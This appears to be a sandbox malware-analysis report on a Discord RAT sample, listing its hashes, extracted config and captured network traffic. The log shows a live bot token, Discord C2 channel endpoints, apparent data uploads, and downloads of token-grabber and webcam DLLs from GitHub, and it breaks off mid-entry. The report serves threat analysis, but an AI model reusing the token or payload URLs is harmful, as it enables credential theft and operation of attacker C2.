Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    125s
  • max time network
    126s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    09/05/2024, 14:23 UTC

General

  • Target

    Xeroexecutor.exe

  • Size

    78KB

  • MD5

    a4b35f10a18f1c4360b00f828abbc2b5

  • SHA1

    78c9ba86d8b3ca966b66ddb182c08268c79858a6

  • SHA256

    b4ca7c2c6efafb1d7402096885dcae56f6fb3d845b758ed3c1cfef21792e1444

  • SHA512

    47703141997cae647f52f692a62b38bc7543f739b5334f387f8753716cadb488898abeda21732b13c7153e0bcbc76a44c9d821f899c3b137892587538296bb3b

  • SSDEEP

    1536:52WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+KPIC:5Zv5PDwbjNrmAE+WIC

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY

  • server_id

    1237709600602722354

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Downloads MZ/PE file
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Xeroexecutor.exe
    "C:\Users\Admin\AppData\Local\Temp\Xeroexecutor.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2676

Network

  • flag-us
    DNS
    gateway.discord.gg
    Xeroexecutor.exe
    Remote address:
    8.8.8.8:53
    Request
    gateway.discord.gg
    IN A
    Response
    gateway.discord.gg
    IN A
    162.159.135.234
    gateway.discord.gg
    IN A
    162.159.133.234
    gateway.discord.gg
    IN A
    162.159.130.234
    gateway.discord.gg
    IN A
    162.159.136.234
    gateway.discord.gg
    IN A
    162.159.134.234
  • flag-us
    GET
    https://gateway.discord.gg/?v=9&encording=json
    Xeroexecutor.exe
    Remote address:
    162.159.135.234:443
    Request
    GET /?v=9&encording=json HTTP/1.1
    Connection: Upgrade,Keep-Alive
    Upgrade: websocket
    Sec-WebSocket-Key: 26iAYpXxRTASShXuIDK1Ig==
    Sec-WebSocket-Version: 13
    Host: gateway.discord.gg
    Response
    HTTP/1.1 101 Switching Protocols
    Date: Thu, 09 May 2024 14:23:34 GMT
    Connection: upgrade
    sec-websocket-accept: xvw7DTNjAc820iBnkI2DQMdFcAQ=
    upgrade: websocket
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNERUNV4VWnm0NklWCs0C%2BlWctksfZgkcnYz2Kr8ai6nIHEo4CiC5jW6S1rH1jT5QE%2Bg4xOIyBTJHbuIBcomwbS7JtaT1PqQjvqI70zaJT3o50kvAu4fxwlP4rOXTBDtoCJxEA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    X-Content-Type-Options: nosniff
    Server: cloudflare
    CF-RAY: 8812591f6d4460dd-LHR
  • flag-us
    DNS
    discord.com
    Xeroexecutor.exe
    Remote address:
    8.8.8.8:53
    Request
    discord.com
    IN A
    Response
    discord.com
    IN A
    162.159.136.232
    discord.com
    IN A
    162.159.137.232
    discord.com
    IN A
    162.159.135.232
    discord.com
    IN A
    162.159.138.232
    discord.com
    IN A
    162.159.128.233
  • flag-us
    POST
    https://discord.com/api/v9/guilds/1237709600602722354/channels
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/guilds/1237709600602722354/channels HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 29
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 201 Created
    Date: Thu, 09 May 2024 14:23:36 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=b9274f580e0f11efa46a7a13f4bcce61; Expires=Tue, 08-May-2029 14:23:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: be56019ae011689ff5baf218062aacf5
    x-ratelimit-limit: 2000
    x-ratelimit-remaining: 1999
    x-ratelimit-reset: 1715351016.418
    x-ratelimit-reset-after: 86400.000
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K%2F0H9GkPG7sZjznhax8JHbW6pJ72LhTI7unnyaDpkuJ0WH7a4NOC6WUOU3jptLViuDCjLHG2rbHIyZx5mc7vmQEeigIvK84iH%2FM4qDjERL%2BXzARWMRYn%2BhioM1c2"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=b9274f580e0f11efa46a7a13f4bcce615a4b103059f82c89957e4d041c301ced9ffe6c9540ce712e90bb1456cc39b7f3; Expires=Tue, 08-May-2029 14:23:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=db113242c805bd68379ae757c1d2a7326a199ad8-1715264616; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=x86uKguZnLGbKrcpwAH8x9QMLXs3Tm_4neGZTg9lw_E-1715264616588-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 8812592bdca57324-LHR
  • flag-us
    DNS
    234.135.159.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    234.135.159.162.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    geolocation-db.com
    Xeroexecutor.exe
    Remote address:
    8.8.8.8:53
    Request
    geolocation-db.com
    IN A
    Response
    geolocation-db.com
    IN A
    159.89.102.253
  • flag-de
    GET
    https://geolocation-db.com/json
    Xeroexecutor.exe
    Remote address:
    159.89.102.253:443
    Request
    GET /json HTTP/1.1
    Host: geolocation-db.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx/1.14.0 (Ubuntu)
    Date: Thu, 09 May 2024 14:23:36 GMT
    Content-Type: text/html
    Content-Length: 194
    Location: https://geolocation-db.com/json/
    Connection: keep-alive
  • flag-de
    GET
    https://geolocation-db.com/json/
    Xeroexecutor.exe
    Remote address:
    159.89.102.253:443
    Request
    GET /json/ HTTP/1.1
    Host: geolocation-db.com
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Thu, 09 May 2024 14:23:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Access-Control-Allow-Origin: *
  • flag-us
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 116
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:23:37 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=b9b7ce340e0f11efb257dadefbae2c79; Expires=Tue, 08-May-2029 14:23:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1715264618.361
    x-ratelimit-reset-after: 1.000
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXAORW3WOUuIhRTr952VRUOQ07sWTOjYUOXsMclguNQwxj%2BYlnGS6lo%2BLApNeMgkBM0yHAZLn29eSDqZhWfjkYmFN7Re%2FRZJpsMsn%2BMknSChVMgJrkV3kGnj2Gal"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=b9b7ce340e0f11efb257dadefbae2c79d456d5a29d6e8a7e54f42fc3a484543b10e3c8096b4fc673cf3ea53082b42237; Expires=Tue, 08-May-2029 14:23:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=c3b3aa51e84a0bce716afb777fac4983703e1d6d-1715264617; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=QQo4n5cBgvbVnTOsv3D8uysehUQ1oePMyuQRKc1cFEk-1715264617536-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 88125931cdd276cc-LHR
  • flag-us
    DNS
    232.136.159.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.136.159.162.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    253.102.89.159.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    253.102.89.159.in-addr.arpa
    IN PTR
    Response
  • flag-us
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: multipart/form-data; boundary="0b7af09f-1a4b-473f-8fee-8a83f669034f"
    Host: discord.com
    Content-Length: 429690
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:23:49 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=c107038a0e0f11efba074a1ad3516406; Expires=Tue, 08-May-2029 14:23:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1715264630.216
    x-ratelimit-reset-after: 1.000
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TyYc5VkzTsbhb9%2FdVZbBQrV6ZL0Q61UeXiSsmq2MAuEtSrG2OoVhVOyjGILnuu9xRvlSN1g7rAJYz4qJ%2FIu3jR3JYZslDWdJK4LYaQlU3HWe43GdICL1EXtG0vnj"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=c107038a0e0f11efba074a1ad351640653ccf9503c86a9a31b8920d67b48c40cc30853fe42bae314dddafc93311fdeb8; Expires=Tue, 08-May-2029 14:23:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=4d2d09abd90ca0308dbeac8f4c7934388a76aded-1715264629; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=NhHutmer7BF2rF3rPM1QEhsMaFETW4khjoyEn3bv5LU-1715264629800-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 88125979c834941b-LHR
  • flag-us
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 31
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:23:50 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=c13bc9120e0f11efa5cd7ef7caddeb3d; Expires=Tue, 08-May-2029 14:23:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 3
    x-ratelimit-reset: 1715264631.221
    x-ratelimit-reset-after: 1.175
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2FlY15EmmpCTtkAfjZ08xu8JBudQ4HwOHL3GbWm%2FR0zLF60GEraeXlyZq22NIpYs6%2BQMbDViGfSoqRTFnYvQYYjdyIZlnTOBmSZUYFzETHqeHJZW9Kxeif25dCG4"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=c13bc9120e0f11efa5cd7ef7caddeb3db108e21db7ccbf144bb2f3824b4a9082d25bfc3d56ddc7922c57ec6f3d3cc63f; Expires=Tue, 08-May-2029 14:23:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=f6cfec3732f0bed84bd169e004f9f2931489d36a-1715264630; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=EU8qKb_d503I2bIYIJdoQwb_9QiZmjlT8z0hfx8uz8k-1715264630146-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 881259810d17949c-LHR
  • flag-us
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: multipart/form-data; boundary="9c70f21a-37b0-4f9d-a736-294f6de117c8"
    Host: discord.com
    Content-Length: 3557
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:24:03 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=c9291fee0e0f11ef87867ee3850b10bd; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1715264644.031
    x-ratelimit-reset-after: 1.000
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iI7Zkamq078CQMvt6hNUdHZ%2F5xRX0buDZIocaVQsrPB0DUlt7IsgWOLSWkDi3gv07kJi4DXUpbfxnn3KNZtemdHb0ywnzicamcc6ew9RpKZGheBNKOAOWlT%2FePU7"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=c9291fee0e0f11ef87867ee3850b10bd6eaca715e2631d527c05eba598e51446694bf93584aaba494cd060d32632f86f; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=df9f07d9999f1566681e241643ca11fb25020dba-1715264643; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=kp9yikD.9AYczCKuJwmPGejBrw3hBQVPx0UVH4eMz34-1715264643444-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 881259d1bdaa24b7-LHR
  • flag-us
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 31
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:24:03 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=c95eed9a0e0f11ef8a96ee0fdedbfaae; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 3
    x-ratelimit-reset: 1715264645.025
    x-ratelimit-reset-after: 1.329
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCsvN0eqnwTCJaL1OdCL%2BqjaPjVUJgpcbCpYtyfGpC8pM4L9wbGoatS80zuj0Md9DNJIwJgE5gS2GDeyvSxkqMupLwxtAnL15%2BbIipbzhKp1RfRaCKS7Leo0gvos"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=c95eed9a0e0f11ef8a96ee0fdedbfaae4cba57d10d1d3d3844b4c3cae959069cc3daa742ab76399ec891938ffaa5a278; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=df9f07d9999f1566681e241643ca11fb25020dba-1715264643; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=CQscJ9x_5JYZd0RB6OnAZ8Q1AOZDkPd1P6K_ZvZQZg8-1715264643815-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 881259d649867198-LHR
  • flag-us
    DNS
    raw.githubusercontent.com
    Xeroexecutor.exe
    Remote address:
    8.8.8.8:53
    Request
    raw.githubusercontent.com
    IN A
    Response
    raw.githubusercontent.com
    IN A
    185.199.109.133
    raw.githubusercontent.com
    IN A
    185.199.111.133
    raw.githubusercontent.com
    IN A
    185.199.108.133
    raw.githubusercontent.com
    IN A
    185.199.110.133
  • flag-us
    GET
    https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll
    Xeroexecutor.exe
    Remote address:
    185.199.109.133:443
    Request
    GET /moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll HTTP/1.1
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 2901504
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: application/octet-stream
    ETag: "7aa094c7a5e7645371637e2935e65a95ac7ec8899b4f08b38009a9f1887128d9"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: 520A:17E061:3B5A3F:48EFFD:663CDCA6
    Accept-Ranges: bytes
    Date: Thu, 09 May 2024 14:24:39 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lcy-eglc8600085-LCY
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1715264679.998598,VS0,VE199
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 538f4d5eff5fb505522334cff6a94d1eacf807e9
    Expires: Thu, 09 May 2024 14:29:39 GMT
    Source-Age: 0
  • flag-us
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 20
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:24:40 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=df0afe720e0f11efb08556f99f94da73; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1715264681.039
    x-ratelimit-reset-after: 1.000
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lsb8%2Bn1SuAGTkjVowoOxZUylyCfidozjUPeP00CyWftmp4qo6IELWnv3MsquYyWaFQfCUXzjkyfcFvMTBfxw8ZKSVydMZyenb8I70v%2FoKhalU4N%2BCVQkbqG8Vr7q"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=df0afe720e0f11efb08556f99f94da7330d953b55fa52cc76d030e691d48b209c471300f16eef5692765464f2041e819; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=9fed67a20803f8a2d12c0145ac82f6fdd218f820-1715264680; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=7QIfCTAc5akM358jxHdiJsw2fON.ylycnpSku4SM51Q-1715264680162-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 88125ab939179503-LHR
  • flag-us
    DNS
    133.109.199.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.109.199.185.in-addr.arpa
    IN PTR
    Response
    133.109.199.185.in-addr.arpa
    IN PTR
    cdn-185-199-109-133githubcom
  • flag-us
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 31
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:24:40 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=df3f10ae0e0f11ef8953a27d37c5972a; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 3
    x-ratelimit-reset: 1715264682.039
    x-ratelimit-reset-after: 1.630
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sanHyNzJwbZDqLJKKi5cV4xBSNAPYQ2p8ZcCX5D4g3W69q7WSmnU%2F4x%2FEMcohuQ8CRbktFIq%2Fks3eFhJmhB4cE3iXmgjGehiImt%2Bkr3KiSgCE%2FIK9WNWgwhfB6Og"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=df3f10ae0e0f11ef8953a27d37c5972a1e8724111627e64e20fe8ec32ee64f6aeb9861ede0d2d28478b6e9369b085f06; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=9fed67a20803f8a2d12c0145ac82f6fdd218f820-1715264680; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=6IfMpQHY4tG9KbUqXiMqNRrfoBEVKM8ap_LuFxwTFeE-1715264680514-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 88125abbca3a79c6-LHR
  • flag-us
    DNS
    13.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll
    Xeroexecutor.exe
    Remote address:
    185.199.109.133:443
    Request
    GET /moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll HTTP/1.1
    Host: raw.githubusercontent.com
    Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 39936
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: application/octet-stream
    ETag: "f50f41ce6d31d22a2bffcc57235e46a4d7a05fb38896fd150333f34701eb4b56"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: 515C:1CC8B4:2ED44A:397B90:663CDCBE
    Accept-Ranges: bytes
    Date: Thu, 09 May 2024 14:25:10 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lcy-eglc8600096-LCY
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1715264711.545413,VS0,VE157
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 13e5eacf71b2ed7f841b43abb8b0846c6807e6c7
    Expires: Thu, 09 May 2024 14:30:10 GMT
    Source-Age: 0
  • flag-us
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 31
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:25:11 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=f181d76a0e0f11efb6b79ac70ff69aa5; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
